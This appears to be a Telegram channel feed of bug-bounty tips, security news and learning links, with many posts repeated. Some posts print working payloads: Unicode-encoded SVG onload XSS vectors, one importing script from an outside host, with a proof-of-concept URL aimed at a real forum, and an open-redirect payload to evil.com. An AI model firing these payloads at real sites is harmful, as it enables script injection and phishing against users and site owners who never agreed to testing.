Forwarded from The Hacker News
A 23-year-old Russian national has been indicted in the U.S. and added to the FBI's Cyber Most Wanted list for allegedly administering a cybercrime forum that sold stolen login credentials, personal and credit card data.
Read: https://thehackernews.com/2022/03/23-year-old-russian-hacker-wanted-by.html
Read: https://thehackernews.com/2022/03/23-year-old-russian-hacker-wanted-by.html
❤1👍1
Unicode #XSS Vectors
Courtesy by @KN0X55
<Svg OnLoad=confirm(1)>
%C0%BCSvg%C0%A0OnLoad%C0%BDconfirm%C0%A81%C0%A9%C0%BE
<Svg OnLoad=import('//X55.is')>
%C0%BCSvg%C0%A0OnLoad%C0%BDimport%C0%A8%C0%A7%C0%AF%C0%https://t.co/CV0GcKUoK1%C0%A7%C0%A9%C0%BE
PoC: https://bbs.tianya.cn/tag/--%3E%C0%BCSvg%C0%A0OnLoad%C0%BDconfirm%C0%A81%C0%A9%C0%BE
Courtesy by @KN0X55
<Svg OnLoad=confirm(1)>
%C0%BCSvg%C0%A0OnLoad%C0%BDconfirm%C0%A81%C0%A9%C0%BE
<Svg OnLoad=import('//X55.is')>
%C0%BCSvg%C0%A0OnLoad%C0%BDimport%C0%A8%C0%A7%C0%AF%C0%https://t.co/CV0GcKUoK1%C0%A7%C0%A9%C0%BE
PoC: https://bbs.tianya.cn/tag/--%3E%C0%BCSvg%C0%A0OnLoad%C0%BDconfirm%C0%A81%C0%A9%C0%BE
bbs.tianya.cn
天涯论坛_全球华人网上家园_天涯社区
天涯论坛是天涯社区旗下的主打论坛产品,24小时随时更新,荟萃天涯社区新鲜、火热、有趣的内容,你感兴趣的都在这里!
Open Redirection issue :
Payload : ///////////////////////////evil.com
Vuln URL:
https://example.com/account/login
Valid Parameter: ?next=
Affected URL :
https://example.com/account/login/?next=///////////////////////////evil.com
#bugbounty #bugbountytips #Redirection
Payload : ///////////////////////////evil.com
Vuln URL:
https://example.com/account/login
Valid Parameter: ?next=
Affected URL :
https://example.com/account/login/?next=///////////////////////////evil.com
#bugbounty #bugbountytips #Redirection
FUZZING FOR BEGINNERS (KUGG teaches STÖK American fuzzy lop)
Credit :- stok
#pentesting #bugbounty #bugbountytips #bugbountytip #infosec #cybersec #resources
https://www.youtube.com/watch?v=O3hb6HV1ZQo&feature=youtu.be
Credit :- stok
#pentesting #bugbounty #bugbountytips #bugbountytip #infosec #cybersec #resources
https://www.youtube.com/watch?v=O3hb6HV1ZQo&feature=youtu.be
YouTube
FUZZING FOR BEGINNERS (KUGG teaches STÖK American fuzzy lop)
In this episode of "STÖK, time to learn something new". KUGG (Christoffer Jerkeby) From F-Secure shows STÖK the basics of FUZZING using American Fuzzy lop. They FUZZ a HTTP server and get two crashes, crashes that with the right exploit could give an attacker…
Blind Cross Site Scripting (XSS) Overview - Bug Bounty Hunting & Web App Pentesting
#pentesting #bugbounty #bugbountytips #bugbountytip #infosec #cybersec #XSS #Blind_XSS
https://t.co/Ijnjjv6ujb
#pentesting #bugbounty #bugbountytips #bugbountytip #infosec #cybersec #XSS #Blind_XSS
https://t.co/Ijnjjv6ujb
YouTube
Blind Cross Site Scripting (XSS) Overview - Bug Bounty Hunting & Web App Pentesting
Sponsor: https://go.intigriti.com/thecybermentor
Links:
https://portswigger.net/web-security/cross-site-scripting/stored/lab-html-context-nothing-encoded
https://xsshunter.com
https://medium.com/bugbountywriteup/blind-xss-for-beginners-c88e48083071
❓Info❓…
Links:
https://portswigger.net/web-security/cross-site-scripting/stored/lab-html-context-nothing-encoded
https://xsshunter.com
https://medium.com/bugbountywriteup/blind-xss-for-beginners-c88e48083071
❓Info❓…
Recommended Book That Increase Your LVL from Scratch to Advance in Web Pentesting
Top 5 Book 📕:-
1⃣ The Web Application Hacker's Handbook
2⃣ Web Hacking 101
3⃣ Mastering Modern Web Penetration Testing by
Prakhar Prasad
4⃣ Seven Deadliest Web Application Attacks
5⃣ The Browser Hacker's Handbook
Top 5 Book 📕:-
1⃣ The Web Application Hacker's Handbook
2⃣ Web Hacking 101
3⃣ Mastering Modern Web Penetration Testing by
Prakhar Prasad
4⃣ Seven Deadliest Web Application Attacks
5⃣ The Browser Hacker's Handbook
🤡 SAML Zine 🤡
@boxyhq presents the SAML Zine 🎉🎉🥳💘😍
Grab it for Free -> https://t.co/AXTmzxS1Gs and let us know how do you like it.
Share for more reach. 😎
#infosec #appsec #security #securityzines #bugbountytips #bugbounty
@boxyhq presents the SAML Zine 🎉🎉🥳💘😍
Grab it for Free -> https://t.co/AXTmzxS1Gs and let us know how do you like it.
Share for more reach. 😎
#infosec #appsec #security #securityzines #bugbountytips #bugbounty
Exploiting DOM Based XSS via Misconfigured postMessage() Function
https://medium.com/@armaanpathan/exploiting-dom-based-xss-via-misconfigured-postmessage-function-bfc794969a0a
https://medium.com/@armaanpathan/exploiting-dom-based-xss-via-misconfigured-postmessage-function-bfc794969a0a
Medium
Exploiting DOM Based XSS via Misconfigured postMessage() Function
Today, we will be discussing how to exploit DOM-based XSS through Misconfigured Postmessage function. Two sites can communicate with each…
FREE LAB ALERTTTT
https://hackxpert.com/RXSS/GET/00.php?fname=
Can you find the XSS?
If you can't make sure to check the comments for a hint
https://hackxpert.com/RXSS/GET/00.php?fname=
Can you find the XSS?
If you can't make sure to check the comments for a hint
Forwarded from The Hacker News
Hackers are exploiting recently disclosed critical Spring4Shell vulnerability to execute the Mirai botnet.
Read details: https://thehackernews.com/2022/04/hackers-exploiting-spring4shell.html
Read details: https://thehackernews.com/2022/04/hackers-exploiting-spring4shell.html
Forwarded from Bug Bounty
☝️🌿 Some book that will help you to reach out to become beginner to advance in cyber security
❤4